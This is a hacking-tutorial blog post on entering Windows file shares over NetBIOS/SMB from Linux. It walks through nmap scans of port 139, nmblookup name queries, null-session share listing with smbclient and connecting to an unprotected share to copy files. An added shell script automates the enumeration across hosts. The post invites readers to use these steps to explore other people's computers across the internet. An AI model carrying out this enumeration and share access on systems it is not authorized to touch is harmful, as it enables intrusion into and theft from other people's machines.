Play fun with samba to hack netbios

This is another way of attacking a Windows box, and it is especially useful on our own local area network. This post shows how to reach a Windows NetBIOS share from a Linux machine using the Samba client tools. The first step in exploring remote shares is to find computers that are offering shares at all. For that we use nmap, scanning for hosts with TCP port 139 open. If the port is filtered we may have trouble, but if it is open we should be good to begin exploring. NetBIOS over TCP/IP uses UDP 137 (name service), UDP 138 (datagram service) and TCP 139 (session service, which carries the SMB file sharing traffic); Windows 2000 and later also serve SMB directly on TCP 445, so it is worth scanning that port at the same time.

[root@fxreza /]# nmap -sS -O xx.xx.xx.xx -p 139

Warning: OS detection will be MUCH less reliable because we did not find at least 1 open
and 1 closed TCP port
Interesting ports on (xx.xx.xx.xx):
Port State Service
139/tcp open netbios-ssn

OK, so now we have a potential target with the right port open (the OS-detection warning appears because we only scanned one port; nmap wants one open and one closed port to fingerprint reliably). The next stage is to find out the machine's NetBIOS name. Without it we cannot request share information over port 139, because a NetBIOS session request has to name the server it wants to talk to rather than just give its IP address (Microsoft's networking identifies computers on a network by name first). The syntax for requesting name information is 'nmblookup -A 111.111.111.111' with the target's IP address in place of the ones. The '-A' flag tells nmblookup to query the node status of a remote computer by IP; it is the equivalent of the Windows command 'nbtstat -A 111.111.111.111', which dumps the same NetBIOS name table. Let's see what we can see, starting with the machine at xx.xx.xx.xx:

[root@fxreza /]# nmblookup -A xx.xx.xx.xx
Looking up status of xx.xx.xx.xx

(The target's NetBIOS name table is listed here. The unique <00> entry is the computer name, and a unique <20> entry means the machine runs the file-sharing service, which is what we want. That name goes into the smbclient command, with '-I' giving the IP address so no name resolution is needed:)

[root@laptop /]# smbclient -L ComputerName -I xx.xx.xx.xx

I gave an empty password (a so-called null session) and it turned out that I could retrieve this list without one. Use the '-N' flag on the smbclient command to suppress the password prompt and make the null session explicit. Windows 2000 allows this by default; later versions tightened anonymous enumeration through the RestrictAnonymous policy, so on a newer box expect the list request itself to ask for credentials.

Next we try to get inside the target's C drive. 'c$' is the hidden administrative share for the whole drive, which Windows only hands out to an account with local administrator rights, so a null session gets nowhere:

[root@laptop /]# smbclient //ComputerName/c$ -I xx.xx.xx.xx
added interface ip=xx.xx.xx.xx bcast=yy.yy.yy.yy nmask=255.255.255.224
Password:
tree connect failed: ERRSRV - ERRbadpw (Bad password - name/password pair in a Tree
Connect or Session Setup are invalid.)

OK, that failed. We'll find another target, exactly as we did in the first step, and on this one we'll try to connect to the 'share' disk share, a share the owner created rather than an administrative one. We use the same 'smbclient' command, but with different arguments: instead of listing shares we request a connection to one. If that completes successfully our prompt changes to:

smb: \>

At that point you can type '?' to get a list of commands. smbclient behaves a lot like an ftp client, so ls, cd, get, put, mget and mput all work the way you would expect. Let's go ahead and see what happens when we request access to this share:

[root@fxreza /]# smbclient //AnotherTarget/share -I ab.cd.ef.gh -N
added interface ip=ab.cd.ef.gh bcast=ww.ww.ww.ww nmask=255.255.255.224
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
smb: \>

And you'll notice we're in, with no password at all; the banner also tells us it is a Windows 2000 box (NT 5.0) in the WORKGROUP workgroup. At this point we can use 'put' or 'get' to push or pull files to and from the share. For instance, to grab NewDoc.txt (its size shows as '0', so I know it's empty) I use:

smb: \> get NewDoc.txt
getting file NewDoc.txt of size 0 as NewDoc.txt (0.0 kb/s) (average 0.0 kb/s)
smb: \> exit
[root@fxreza /]# ls -l NewDoc.txt
-rw-r--r-- 1 root root 0 Mar 17 09:28 NewDoc.txt
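The whole walk above, scan, name lookup, share list, connect, can be scripted. The following is an added example and not code from the original post: it wraps the two outputs a human reads by eye (the nmblookup name table and the smbclient -L share list) in small awk parsers and drives the same smbclient commands with them. All sample output is constructed, and the host 10.0.0.5 and machine name WIN2K are made up; enumerate_host is the only part that touches the network and is not run here.

```shell
#!/bin/sh
# Added example, not from the original post. Parses the output of the tools
# the post uses (nmblookup -A, smbclient -L) so the enumeration can be
# scripted. Sample output below is constructed; 10.0.0.5 / WIN2K are made up.

# NetBIOS name offering the File Server service (unique <20> entry) from
# `nmblookup -A <ip>` output on stdin. This is the name smbclient wants.
netbios_server_name() {
    awk '$2 == "<20>" && $4 != "<GROUP>" { print $1; exit }'
}

# Workgroup or domain name: the <00> entry flagged <GROUP>.
netbios_workgroup() {
    awk '$2 == "<00>" && $4 == "<GROUP>" { print $1; exit }'
}

# Visible disk shares from `smbclient -L` output on stdin, one per line.
# Names ending in $ (C$, ADMIN$, print$) are hidden administrative shares
# that need an administrator's credentials, so they are left out.
disk_shares() {
    awk '
        /^[ \t]*Sharename[ \t]+Type/ { in_table = 1; next }
        in_table && /^[ \t]*-+/      { next }     # dashed underline
        in_table && NF == 0          { exit }     # blank line ends the table
        in_table && $2 == "Disk" && substr($1, length($1), 1) != "$" { print $1 }
    '
}

# The live procedure from the post, driven by the parsers above.
# Not run here; usage: enumerate_host 10.0.0.5   (needs nmap, nmblookup, smbclient)
enumerate_host() {
    ip=$1
    nmap -sS -p 139,445 "$ip" | grep -q '^139/tcp *open' || {
        echo "$ip: port 139 not open" >&2; return 1; }
    name=$(nmblookup -A "$ip" | netbios_server_name)
    [ -n "$name" ] || { echo "$ip: no file-server name in name table" >&2; return 1; }
    # -N: null session, no password prompt.  -c: run one smb command and exit.
    smbclient -L "$name" -I "$ip" -N | disk_shares | while read -r share; do
        echo "== //$name/$share"
        smbclient "//$name/$share" -I "$ip" -N -c 'ls'
    done
}

# Constructed `nmblookup -A 10.0.0.5` output.
SAMPLE_NMBLOOKUP='Looking up status of 10.0.0.5
        WIN2K           <00> -         B <ACTIVE>
        WIN2K           <20> -         B <ACTIVE>
        WORKGROUP       <00> - <GROUP> B <ACTIVE>
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>

        MAC Address = 00-50-56-C0-00-01'

# Constructed `smbclient -L WIN2K -I 10.0.0.5 -N` output.
SAMPLE_SMBCLIENT='Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

        Sharename       Type      Comment
        ---------       ----      -------
        IPC$            IPC       Remote IPC
        share           Disk
        public          Disk      Everyone can write here
        C$              Disk      Default share
        ADMIN$          Disk      Remote Admin
        print$          Disk      Printer Drivers

        Server               Comment
        ---------            -------
        WIN2K

        Workgroup            Master
        ---------            -------
        WORKGROUP            WIN2K'

# Dry run over the constructed samples.
printf 'server name: %s\n' "$(printf '%s\n' "$SAMPLE_NMBLOOKUP" | netbios_server_name)"
printf 'workgroup:   %s\n' "$(printf '%s\n' "$SAMPLE_NMBLOOKUP" | netbios_workgroup)"
printf 'open shares: %s\n' "$(printf '%s\n' "$SAMPLE_SMBCLIENT" | disk_shares | tr '\n' ' ')"
```

The parsers key on the fixed columns of the real tool output: the <20> service suffix is what marks a host as a file server (a <00> entry alone only says the name is registered), and the trailing '$' is the only thing that distinguishes an administrative share from one a user created, which is why the c$ attempt above needed a password and the 'share' attempt did not.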

Remember, I'm writing this article for educational purposes only. It is more than possible to use the information herein for legitimate purposes. Please remember, if you're going to use this information to go exploring across the internet, don't delete or destroy anything. People get concerned when they shut down their home computers and get a 'Warning: 1 user is still connected', but when they find their tax information has been destroyed they call the cops. :D :D
